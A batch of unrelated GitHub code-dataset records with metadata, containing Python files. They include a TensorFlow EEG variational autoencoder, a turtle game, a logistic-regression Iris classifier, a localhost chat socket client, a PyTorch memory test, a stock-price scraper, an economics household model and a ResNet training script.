tf.nn.embedding_lookup(embeddings, x)\n #embedded = tf.reshape(embedded, [-1, x.get_shape()[-1]*16])\n\n w0 = tf.Variable(w_init([x.get_shape()[1].value, n_hidden]), 'w0')\n b0 = tf.get_variable('b0', [n_hidden], initializer=b_init)\n h0 = tf.matmul(x, w0) + b0\n h0 = tf.nn.elu(h0)\n h0 = tf.nn.dropout(h0, keep_prob)\n\n # 2nd hidden layer\n w1 = tf.get_variable('w1', [h0.get_shape()[1], n_hidden], initializer=w_init)\n b1 = tf.get_variable('b1', [n_hidden], initializer=b_init)\n h1 = tf.matmul(h0, w1) + b1\n h1 = tf.nn.elu(h1)\n h1 = tf.nn.dropout(h1, keep_prob)\n\n #h2 = tf.reshape(h2, [-1, n_hidden, 256])\n #h2 = tf.reduce_sum(h2, axis=2)\n\n # output layer\n # borrowed from https: // github.com / altosaar / vae / blob / master / model.py\n wo = tf.get_variable('wo', [h1.get_shape()[1], n_output * 2], initializer=w_init)\n bo = tf.get_variable('bo', [n_output * 2], initializer=b_init)\n gaussian_params = tf.matmul(h1, wo) + bo\n\n # The mean parameter is unconstrained\n mean = gaussian_params[:, :n_output]\n # The standard deviation must be positive. Parametrize with a softplus and\n # add a small epsilon for numerical stability\n stddev = tf.nn.softplus(gaussian_params[:, n_output:] + 1e-8)\n\n return mean, stddev\n\ndef bi_rnn_encoder(x, n_hidden, n_output, keep_prob):\n with tf.variable_scope(\"bi_rnn_encoder\"):\n\n x = tf.reshape(x, [-1, nchannel, 128])\n x = tf.transpose(x, perm=[0, 2, 1])\n\n cell = tf.nn.rnn_cell.LSTMCell(n_hidden, state_is_tuple=True)\n lstmcell = tf.contrib.rnn.InputProjectionWrapper(cell, x.get_shape()[-1].value, activation=tf.nn.elu)\n outputs, states = tf.nn.bidirectional_dynamic_rnn(cell_fw=cell,\n cell_bw=cell,\n dtype=tf.float32,\n inputs=x)\n\n states = tf.reduce_sum(states, [0,1])\n states = tf.reshape(states, [-1,n_hidden])\n\n gaussian_params = tf.layers.dense(states, n_output*2)\n # The mean parameter is unconstrained\n mean = gaussian_params[:, :n_output]\n # The standard deviation must be positive. Parametrize with a softplus and\n # add a small epsilon for numerical stability\n stddev = tf.nn.softplus(gaussian_params[:, n_output:] + 1e-8)\n\n return mean, stddev\n\ndef bi_rnn_decoder(z, n_hidden, n_output, keep_prob):\n init_vector = tf.layers.dense(z, n_hidden)\n #init_vector = tf.reshape(tf.tile(init_vector, [1,2]), [2,-1,n_hidden])\n initial = tf.contrib.rnn.LSTMStateTuple(init_vector, init_vector)\n n_out = tf.cast(n_output / nchannel, tf.int32)\n with tf.variable_scope(\"bi_rnn_decoder\"):\n #x = tf.tile(z, [1, n_out])\n #x = tf.reshape(x, [-1, n_out, z.get_shape()[1].value])\n x = tf.zeros([128, n_out, n_hidden])\n cell = tf.nn.rnn_cell.LSTMCell(n_hidden, state_is_tuple=True, activation=tf.nn.elu)\n lstm_cell = tf.contrib.rnn.OutputProjectionWrapper(cell, nchannel)\n outputs, _ = tf.nn.bidirectional_dynamic_rnn(cell_fw=lstm_cell,\n cell_bw=lstm_cell,\n dtype=tf.float32,\n initial_state_fw=initial,\n initial_state_bw=initial,\n inputs=x)\n y = tf.reduce_sum(outputs, 0)\n y = tf.transpose(y, [0, 2, 1])\n y = tf.layers.flatten(y)\n y = tf.nn.sigmoid(y)\n return y\n\n\n# Bernoulli MLP as decoder\ndef bernoulli_MLP_decoder(z, n_hidden, n_output, keep_prob, reuse=False):\n\n with tf.variable_scope(\"bernoulli_MLP_decoder\", reuse=reuse):\n # initializers\n w_init = tf.contrib.layers.variance_scaling_initializer()\n b_init = tf.constant_initializer(0.)\n\n # 1st hidden layer\n w0 = tf.get_variable('w0', [z.get_shape()[1], n_hidden], initializer=w_init)\n b0 = tf.get_variable('b0', [n_hidden], initializer=b_init)\n h0 = tf.matmul(z, w0) + b0\n h0 = tf.nn.elu(h0)\n h0 = tf.nn.dropout(h0, keep_prob)\n\n # 2nd hidden layer\n w1 = tf.get_variable('w1', [h0.get_shape()[1], n_hidden], initializer=w_init)\n b1 = tf.get_variable('b1', [n_hidden], initializer=b_init)\n h1 = tf.matmul(h0, w1) + b1\n h1 = tf.nn.elu(h1)\n h1 = tf.nn.dropout(h1, keep_prob)\n\n # output layer-mean\n wo = tf.get_variable('wo', [h1.get_shape()[1], n_output], initializer=w_init)\n bo = tf.get_variable('bo', [n_output], initializer=b_init)\n y = tf.sigmoid(tf.matmul(h1, wo) + bo)\n #y = tf.reshape(y, [-1, n_output, 256])\n\n return y\ndef one_layer_encoder(input, n_hidden, output_size, keep_prob):\n out = tf.layers.dense(input, output_size*2, activation=tf.nn.elu)\n return out[:,:output_size], tf.nn.relu(out[:,output_size:])\n\ndef one_layer_decoder(inputs, n_hidden, output_size, keep_prob):\n return tf.layers.dense(inputs, output_size, activation=tf.nn.sigmoid)\n\ndef sample(mean, logvar):\n noise = tf.random_normal(tf.shape(mean))\n sample = mean + tf.exp(0.5 * logvar) * noise\n return sample\n\ndef iaf(sample, mean, logvar):\n return -0.5 * (np.log(2 * np.pi) + logvar + tf.square(sample - mean) / tf.exp(logvar))\n\ndef KL_iaf(mu, sigma, dim_z):\n z = sample(mu, sigma)\n\n logqs = iaf(z, mu, sigma)\n L = tf.get_variable(\"inverse_cholesky\", [dim_z, dim_z], dtype=tf.float32, initializer=tf.zeros_initializer)\n diag_one = tf.ones([dim_z], dtype=tf.float32)\n L = tf.matrix_set_diag(L, diag_one)\n mask = np.tril(np.ones([dim_z, dim_z]))\n L = L * mask\n latent_vector = tf.matmul(z, L)\n logps = iaf(latent_vector, tf.zeros_like(mu), tf.zeros_like(sigma))\n\n\n KL_divergence = logqs - logps\n\n return (z, KL_divergence)\n\ndef compute_kernel(x, y):\n x_size = tf.shape(x)[0]\n y_size = tf.shape(y)[0]\n dim = tf.shape(x)[1]\n tiled_x = tf.tile(tf.reshape(x, tf.stack([x_size, 1, dim])), tf.stack([1, y_size, 1]))\n tiled_y = tf.tile(tf.reshape(y, tf.stack([1, y_size, dim])), tf.stack([x_size, 1, 1]))\n return tf.exp(-tf.reduce_mean(tf.square(tiled_x - tiled_y), axis=2) / tf.cast(dim, tf.float32))\n\ndef mmd(z_enc, z_sample):\n x_kernel = compute_kernel(z_sample, z_sample)\n y_kernel = compute_kernel(z_enc, z_enc)\n xy_kernel = compute_kernel(z_sample, z_enc)\n return tf.reduce_mean(x_kernel) + tf.reduce_mean(y_kernel) - 2 * tf.reduce_mean(xy_kernel)\n\n\n# interface for encoder:\n# x_hat, n_hidden, dim_z, keep_prob\n# interface for decoder:\n# z, n_hidden, n_output, keep_prob\n\n# Gateway\ndef autoencoder(x_hat, x, dim_img, dim_z, n_hidden, keep_prob, use_iaf=False, use_mmd=True,\n encoder='convolutional_encoder', decoder='convolutional_decoder', mse=False):\n\n\n with tf.variable_scope('autoencoder'):\n dim_img = x_hat.get_shape()[1].value\n\n\n # Dynamically choose encoder and decoder\n this_mod = sys.modules[__name__]\n if encoder.startswith('model_2d'):\n encoder_func = getattr(model_2d, encoder.replace('model_2d.', ''))\n else:\n encoder_func = getattr(this_mod, encoder.replace('model_2d.', ''))\n if decoder.startswith('model_2d'):\n decoder_func = getattr(model_2d, decoder.replace('model_2d.', ''))\n else:\n decoder_func = getattr(this_mod, decoder.replace('model_2d.', ''))\n\n # batch normalize\n # x_hat = tf.layers.batch_normalization(x_hat)\n\n n_layers=5\n\n # encoding\n mu, sigma = encoder_func(x_hat, n_hidden, dim_z, keep_prob)\n\n if use_iaf:\n z, KL_divergence = KL_iaf(mu, sigma, dim_z)\n else:\n # sampling by re-parameterization technique\n z = mu + sigma * tf.random_normal(tf.shape(mu), 0, 1, dtype=tf.float32)\n if use_mmd:\n KL_divergence = mmd(z, tf.random_normal(tf.stack([200, dim_z])))\n else:\n KL_divergence = 0.5 * tf.reduce_sum(tf.square(mu) + tf.square(sigma) - tf.log(tf.square(sigma)) - 1, 1)\n\n y = decoder_func(z, n_hidden, dim_img, keep_prob=keep_prob)\n\n # loss\n if mse:\n marginal_likelihood = tf.losses.mean_squared_error(x, y)\n else:\n marginal_likelihood = -tf.reduce_sum(x * tf.log(y) + (1 - x) * tf.log(1 - y), 1)\n marginal_likelihood = tf.reduce_mean(marginal_likelihood)\n\n marginal_likelihood_grad = tf.gradients(marginal_likelihood, tf.global_variables(scope='autoencoder'))[-1]\n marginal_likelihood_norm = tf.norm(marginal_likelihood_grad, name='norm')\n\n KL_divergence = tf.reduce_mean(KL_divergence)\n\n loss = marginal_likelihood + KL_divergence\n\n return y, z, loss, marginal_likelihood, KL_divergence, marginal_likelihood_norm\n\ndef decoder(z, n_hidden, dim_img, keep_prob=1.0):\n\n y = bernoulli_MLP_decoder(z, n_hidden, dim_img, keep_prob, reuse=True)\n\n return y\n","repo_name":"grappli/eeg-vae","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14237,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"18714506755","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\nimport random\n\n\n\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\n\nplayer = Player()\ncar = CarManager()\n\nscoreboard = Scoreboard()\nscreen.onkeypress(player.go_up, \"Up\")\nscreen.listen()\ngame_is_on = True\ngame_over = False\n\n\ndef start_over():\n scoreboard.start_again()\n player.next_level()\n car.start_again()\n global game_over\n game_over = False\n\n\ndef end_game():\n global game_is_on\n game_is_on = False\n\n\nwhile game_is_on:\n\n time.sleep(0.1)\n # Create Random Cards\n if random.randint(0, 5) == 1:\n car.create_car()\n\n if not game_over:\n car.move()\n else:\n # Ask if they want to start again\n screen.onkeypress(start_over, \"y\")\n screen.onkeypress(end_game, \"n\")\n screen.listen()\n screen.update()\n # When player reaches top of screen\n if player.ycor() > 280:\n player.next_level()\n scoreboard.next_level()\n car.next_level()\n # Checking for collisions with car\n for specific_car in car.car_list:\n if player.distance(specific_car) < 20 or player.distance(specific_car) < 40 and player.ycor() == specific_car.ycor():\n scoreboard.game_over()\n game_over = True\n\n","repo_name":"DanielGresak/turtle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33147263198","text":"# swea 1859번\n\n\ndef max_num(numbers): # 가장 큰 수의 인덱스와 그 값을 찾아줌\n temp = [0, 0]\n for element in range(len(numbers)):\n if int(numbers[element]) > int(temp[1]):\n temp[0] = element\n temp[1] = numbers[element]\n return temp\n\n\ndef aaa(N):\n sale_prices = input().split()\n while True:\n king = max_num(sale_prices)\n sum = 0\n for element in range(int(king[0])):\n sum += (int(king[1]) - int(sale_prices[element]))\n print(sum)\n if king[0] is (N-1):\n break\n else:\n sale_prices = sale_prices[int(king[0])+1:]\n N = N - int(king[0]) + 1\n\n\nT = int(input())\nfor tc in range(T):\n print('#{}'.format(tc+1))\n N = int(input())\n aaa(N)\n\n\n # 가장 큰 수 뒤에 있는 수들도 활용해야한다. 추가해야함!!!!","repo_name":"chich2/Algorithm","sub_path":"SW_Expert_Academy/millionaire_project.py","file_name":"millionaire_project.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72695660394","text":"# Import the libraries\nimport numpy as np #linear algebra\nimport pandas as pd #data processing, CSV file I/O\nimport matplotlib.pyplot as plt #plotting graphs\n\n#Sigmoid Function\ndef sigmoid(z):\n \"\"\"sigmoid function\"\"\"\n return 1 / (1 + np.exp(-z))\n\n#Cost function\ndef cost(theta, x, y):\n \"\"\"cost function\"\"\"\n h = sigmoid(x @ theta)\n m = len(y)\n cost = 1 / m * np.sum(\n -y * np.log(h) - (1 - y) * np.log(1 - h)\n )\n grad = 1 / m * ((y - h) @ x) #GRADIENT\n return cost, grad\n\n#Fitting function\ndef fit(x, y, max_iter=50000, alpha=0.1):\n \"\"\"logisitic classification model\"\"\"\n x = np.insert(x, 0, 1, axis=1) # x0=1\n thetas = []\n classes = np.unique(y) \n costs = np.zeros(max_iter)\n\n for c in classes:\n # one vs. rest binary classification\n binary_y = np.where(y == c, 1, 0) #current class as 1 , rest as 0\n theta = np.zeros(x.shape[1])\n for epoch in range(max_iter):\n costs[epoch], grad = cost(theta, x, binary_y)\n theta += alpha * grad\n thetas.append(theta)\n\n return thetas, classes, costs\n\n#Prediction function\ndef predict(classes, thetas, x):\n \"\"\"predict class from max h(x) value\"\"\"\n x = np.insert(x, 0, 1, axis=1) #x0 = 1\n\n preds = [ np.argmax( [sigmoid(xi @ theta) for theta in thetas] ) for xi in x ]\n return [classes[p] for p in preds]\n\n#Accuracy Score\ndef score(classes, theta, x, y):\n \"\"\"calculating the accuracy score\"\"\"\n return (predict(classes, theta, x) == y).mean() *100\n\n#Data input\niris = pd.read_csv(\"./input/Iris.csv\") #take input\niris = iris.drop(['Id'],axis=1) #removing the id column \n\niris['Species'] =iris['Species'].map({'Iris-setosa':0,'Iris-versicolor':1,'Iris-virginica':2}) \n#assinging integer values to the classes\ndata = np.array(iris)\nnp.random.shuffle(data) #shuffling\n\n#splitting the data in training and testing\nnum_train = int(.7 * len(data)) # 70/30 train/test split\nx_train, y_train = data[:num_train, :-1], data[:num_train, -1]\nx_test, y_test = data[num_train:, :-1], data[num_train:, -1]\n\n#training model with all features\nthetas, classes, costs = fit(x_train, y_train)\n","repo_name":"arrowav36/Iris-Project","sub_path":"Iris.py","file_name":"Iris.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10614954423","text":"from socket import *\n\n\nwhile True:\n data = input(\"我:\")\n if not data:\n break\n sockfd = socket()\n sockfd.connect(('127.0.0.1', 8088))\n sockfd.send(data.encode())\n res = sockfd.recv(1024)\n print(\"小美:\" + res.decode())\n sockfd.close()\n","repo_name":"xiashuo/tedu_execises","sub_path":"month02/day11/tcp_clent.py","file_name":"tcp_clent.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14824021719","text":"# Owner(s): [\"module: unknown\"]\n\nimport collections\nimport unittest\n\nimport torch\nfrom torch.testing._internal.common_utils import (\n TestCase, run_tests, TEST_WITH_ASAN)\n\ntry:\n import psutil\n HAS_PSUTIL = True\nexcept ImportError:\n HAS_PSUTIL = False\n\ndevice = torch.device('cpu')\n\n\nclass Network(torch.nn.Module):\n maxp1 = torch.nn.MaxPool2d(1, 1)\n\n def forward(self, x):\n return self.maxp1(x)\n\n\n@unittest.skipIf(not HAS_PSUTIL, \"Requires psutil to run\")\n@unittest.skipIf(TEST_WITH_ASAN, \"Cannot test with ASAN\")\nclass TestOpenMP_ParallelFor(TestCase):\n batch = 20\n channels = 1\n side_dim = 80\n x = torch.randn([batch, channels, side_dim, side_dim], device=device)\n model = Network()\n\n def func(self, runs):\n p = psutil.Process()\n # warm up for 5 runs, then things should be stable for the last 5\n last_rss = collections.deque(maxlen=5)\n for n in range(10):\n for i in range(runs):\n self.model(self.x)\n last_rss.append(p.memory_info().rss)\n return last_rss\n\n def func_rss(self, runs):\n last_rss = list(self.func(runs))\n # Check that the sequence is not strictly increasing\n is_increasing = True\n for idx in range(len(last_rss)):\n if idx == 0:\n continue\n is_increasing = is_increasing and (last_rss[idx] > last_rss[idx - 1])\n self.assertTrue(not is_increasing,\n msg=f'memory usage is increasing, {str(last_rss)}')\n\n def test_one_thread(self):\n \"\"\"Make sure there is no memory leak with one thread: issue gh-32284\n \"\"\"\n torch.set_num_threads(1)\n self.func_rss(300)\n\n def test_n_threads(self):\n \"\"\"Make sure there is no memory leak with many threads\n \"\"\"\n ncores = min(5, psutil.cpu_count(logical=False))\n torch.set_num_threads(ncores)\n self.func_rss(300)\n\nif __name__ == '__main__':\n run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/test_openmp.py","file_name":"test_openmp.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"3660602326","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\n\nimport scrapy\n\n\ndef convertstringtofloat(somestring):\n return float(somestring.replace(\",\", \".\"))\n\n\nclass NordnetSpider(scrapy.Spider):\n name = 'nordnet'\n start_urls = ['https://www.nordnet.no/market/stocks?sortField=diff_pct&sortOrder=desc&page=1&exchangeCountry=NO',\n 'https://www.nordnet.no/market/stocks?sortField=diff_pct&sortOrder=desc&page=2&exchangeCountry=NO',\n 'https://www.nordnet.no/market/stocks?sortField=diff_pct&sortOrder=desc&page=3&exchangeCountry=NO']\n\n def parse(self, response):\n for stockline in response.xpath(\"//tbody/tr\"):\n date_today = datetime.today()\n stockname = stockline.xpath(\"td[@data-title='Navn']/a/text()\").get()\n last_price_today = stockline.xpath(\"td[@data-title='Siste']/span/span[@aria-hidden='true']/text()\").get()\n last_price_today = convertstringtofloat(last_price_today)\n highest_price_today = stockline.xpath(\"td[@data-title='Høy']/text()\").get()\n highest_price_today = convertstringtofloat(highest_price_today)\n lowest_price_today = stockline.xpath(\"td[@data-title='Lav']/text()\").get()\n lowest_price_today = convertstringtofloat(lowest_price_today)\n turnover = stockline.xpath(\"td[@data-title='Omsetning']/span/span[@aria-hidden='true']/text()\").get()\n turnover = convertstringtofloat(turnover)\n time_of_day = stockline.xpath(\"td[@data-title='Tid']/span/text()\").get()\n\n yield {\n 'date': date_today,\n 'stockname': stockname,\n 'last_price_today': last_price_today,\n 'highest_price_today': highest_price_today,\n 'lowest_price_today': lowest_price_today,\n 'turnover': turnover,\n 'time_of_day': time_of_day\n }\n","repo_name":"Bragalund/StockPriceGatherer","sub_path":"venv/stockpricescraper/stockpricescraper/spiders/nordnetspider.py","file_name":"nordnetspider.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36974452627","text":"from types import SimpleNamespace\n\nimport numpy as np\nfrom scipy import optimize\n\nimport pandas as pd \nimport matplotlib.pyplot as plt\n\nclass HouseholdSpecializationModelClass:\n def __init__(self):\n \"\"\" setup model \"\"\"\n\n # a. create namespaces\n par = self.par = SimpleNamespace()\n sol = self.sol = SimpleNamespace()\n\n # b. preferences\n par.rho = 2.0\n par.nu = 0.001\n par.epsilon = 1.0\n par.omega = 0.5 \n\n # c. household production\n par.alpha = 0.5\n par.sigma = 1.0\n\n # d. wages\n par.wM = 1.0\n par.wF = 1.0\n par.wF_vec = np.linspace(0.8,1.2,5)\n\n # e. targets\n par.beta0_target = 0.4\n par.beta1_target = -0.1\n\n # f. solution\n sol.LM_vec = np.zeros(par.wF_vec.size)\n sol.HM_vec = np.zeros(par.wF_vec.size)\n sol.LF_vec = np.zeros(par.wF_vec.size)\n sol.HF_vec = np.zeros(par.wF_vec.size)\n\n sol.beta0 = np.nan\n sol.beta1 = np.nan\n\n def calc_utility(self,LM,HM,LF,HF):\n \"\"\" calculate utility \"\"\"\n\n par = self.par\n sol = self.sol\n\n # a. consumption of market goods\n C = par.wM*LM + par.wF*LF\n\n # b. home production\n if par.sigma == 0:\n H = np.minimum(HF,HM)\n if par.sigma == 1:\n H = HM**(1-par.alpha)*HF**par.alpha\n else:\n H = ((1-par.alpha)*HM**((par.sigma-1)/par.sigma)+par.alpha*HF**((par.sigma-1)/par.sigma))**(par.sigma/(par.sigma-1))\n\n # c. total consumption utility\n Q = C**par.omega*H**(1-par.omega)\n utility = np.fmax(Q,1e-8)**(1-par.rho)/(1-par.rho)\n\n # d. disutlity of work\n epsilon_ = 1+1/par.epsilon\n TM = LM+HM\n TF = LF+HF\n disutility = par.nu*(TM**epsilon_/epsilon_+TF**epsilon_/epsilon_)\n \n return utility - disutility\n\n def solve_discrete(self,do_print=False):\n \"\"\" solve model discretely \"\"\"\n \n par = self.par\n sol = self.sol\n opt = SimpleNamespace()\n \n # a. all possible choices\n x = np.linspace(0,24,49)\n LM,HM,LF,HF = np.meshgrid(x,x,x,x) # all combinations\n \n LM = LM.ravel() # vector\n HM = HM.ravel()\n LF = LF.ravel()\n HF = HF.ravel()\n\n # b. calculate utility\n u = self.calc_utility(LM,HM,LF,HF)\n \n # c. set to minus infinity if constraint is broken\n I = (LM+HM > 24) | (LF+HF > 24) # | is \"or\"\n u[I] = -np.inf\n \n # d. find maximizing argument\n j = np.argmax(u)\n \n opt.LM = LM[j]\n opt.HM = HM[j]\n opt.LF = LF[j]\n opt.HF = HF[j]\n\n # e. print\n if do_print:\n for k,v in opt.__dict__.items():\n print(f'{k} = {v:6.4f}')\n\n return opt\n\n def solve(self, do_print=False):\n \"\"\" solve model continously \"\"\"\n par = self.par\n sol = self.sol\n opt = SimpleNamespace()\n\n # setting up the function\n def obj(x):\n return -self.calc_utility(x[0], x[1], x[2], x[3],)\n \n # setting bounds and constraints\n bounds = optimize.Bounds([0,0,0,0], [24,24,24,24])\n constraints = optimize.LinearConstraint([[1,1,0,0], [0,0,1,1]], [0,0], [24,24])\n\n # the optimizer with the function, guess, method, bounds and constraints\n result = optimize.minimize(obj, (4,5,8,7), method='trust-constr', bounds=bounds, constraints=constraints)\n\n # Storing the results\n opt.LM = result.x[0]\n opt.HM = result.x[1]\n opt.LF = result.x[2]\n opt.HF = result.x[3]\n\n if do_print:\n for k,v in opt.__dict__.items():\n print(f'{k} = {v:6.4f}')\n\n return opt\n \n def solve_wF_vec(self,discrete=False):\n \"\"\" solve model for vector of female wages \"\"\"\n par = self.par\n sol = self.sol\n\n # Looping over wage-ratio and solving model\n for i,wF in enumerate(par.wF_vec):\n par.wF = wF\n # solve discrete model\n if discrete: \n opt = self.solve_discrete()\n else: \n opt = self.solve()\n\n # store solution \n sol.LM_vec[i] = opt.LM\n sol.HM_vec[i] = opt.HM\n sol.LF_vec[i] = opt.LF\n sol.HF_vec[i] = opt.HF\n \n return sol\n\n def run_regression(self):\n \"\"\" run regression \"\"\"\n\n par = self.par\n sol = self.sol\n\n x = np.log(par.wF_vec)\n y = np.log(sol.HF_vec/sol.HM_vec)\n A = np.vstack([np.ones(x.size),x]).T\n sol.beta0,sol.beta1 = np.linalg.lstsq(A,y,rcond=None)[0]\n \n def estimate(self,alpha=None,sigma=None):\n \"\"\" estimate alpha and sigma \"\"\"\n\n pass","repo_name":"zds655/projects-2023-zds655","sub_path":"inauguralproject/Inaugural_project.py","file_name":"Inaugural_project.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31609331110","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport json\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision\nfrom torchvision import models\nfrom torchvision import datasets, transforms\nimport numpy as np\nimport time\nfrom collections import defaultdict\nmetrics_dict = defaultdict(list)\ncompression_dict = defaultdict(list)\npercentage_of_layers = 0.4\n\ndef generate_mask_array(array_len):\n num_ones = int(array_len * percentage_of_layers)\n num_zeros = array_len - num_ones\n arr = np.array([1] * num_ones + [0] * num_zeros)\n np.random.shuffle(arr)\n return arr\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock, self).__init__()\n num_filter = int(planes/16)\n self.conv1 = nn.ModuleList([\n nn.Conv2d(in_planes, 16, kernel_size=3, stride=stride, padding=1, bias=False) for i in range(num_filter)])\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.ModuleList([\n nn.Conv2d(planes, 16, kernel_size=3, stride=1, padding=1, bias=False) for i in range(num_filter)])\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x):\n out = [b(x) for b in self.conv1]\n out = torch.cat(out, dim=1)\n out = F.relu(self.bn1(out))\n out = [b(out) for b in self.conv2]\n out = torch.cat(out, dim=1)\n out = self.bn2(out)\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion*planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\nclass ResNet(nn.Module):\n def __init__(self, block, num_blocks, num_classes=10):\n super(ResNet, self).__init__()\n self.in_planes = 64\n\n self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)\n self.linear = nn.Linear(512*block.expansion, num_classes)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n out = F.log_softmax(out, dim=1)\n return out\n\ndef train(model, device, train_loader, optimizer, epoch, criterion):\n global metrics_dict\n model.train()\n step_count = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n # array_mask = generate_mask_array(len(model.conv1_list))\n # for idx,p in enumerate(model.conv1_list):\n # if array_mask[idx] == 0:\n # p.weight.requires_grad = False\n # p.bias.requires_grad = False\n\n # array_mask = generate_mask_array(len(model.conv2_list))\n # for idx, p in enumerate(model.conv2_list):\n # if array_mask[idx] == 0:\n # p.weight.requires_grad = False\n # p.bias.requires_grad = False\n\n step_count += 1\n #if step_count%20==0 or step_count==1:\n if step_count%200==0:\n print (\"Changing the parameter step_count = {}\".format(step_count))\n for child in model.layer1.children():\n array_mask = generate_mask_array(len(child.conv1))\n for idx, p in enumerate(child.conv1):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n array_mask = generate_mask_array(len(child.conv2))\n for idx, p in enumerate(child.conv2):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n \n for child in model.layer2.children():\n array_mask = generate_mask_array(len(child.conv1))\n for idx, p in enumerate(child.conv1):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n array_mask = generate_mask_array(len(child.conv2))\n for idx, p in enumerate(child.conv2):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n\n \n for child in model.layer3.children():\n array_mask = generate_mask_array(len(child.conv1))\n for idx, p in enumerate(child.conv1):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n array_mask = generate_mask_array(len(child.conv2))\n for idx, p in enumerate(child.conv2):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n\n \n for child in model.layer4.children():\n array_mask = generate_mask_array(len(child.conv1))\n for idx, p in enumerate(child.conv1):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n array_mask = generate_mask_array(len(child.conv2))\n for idx, p in enumerate(child.conv2):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n \n # for param in model.parameters():\n # print (param.requires_grad)\n # import ipdb; ipdb.set_trace()\n optimizer = torch.optim.Adam(filter(lambda p: p.requires_grad,\n model.parameters()), lr=0.01) \n optimizer.zero_grad()\n output = model(data)\n loss = criterion(output, target)\n loss.backward()\n temp_array = np.random.randint(0, high=2, size=10)\n \n # import ipdb; ipdb.set_trace()\n layer_count = 0\n # for param in model.parameters():\n # temp_mod = return_compress(param.grad.data, layer_count)\n # param.grad.data = temp_mod\n # layer_count += 1\n # import ipdb; ipdb.set_trace()\n metrics_dict['loss_value'].append(loss.item())\n optimizer.step()\n if batch_idx % 20 == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\ndef test(model, device, test_loader):\n global metrics_dict\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = 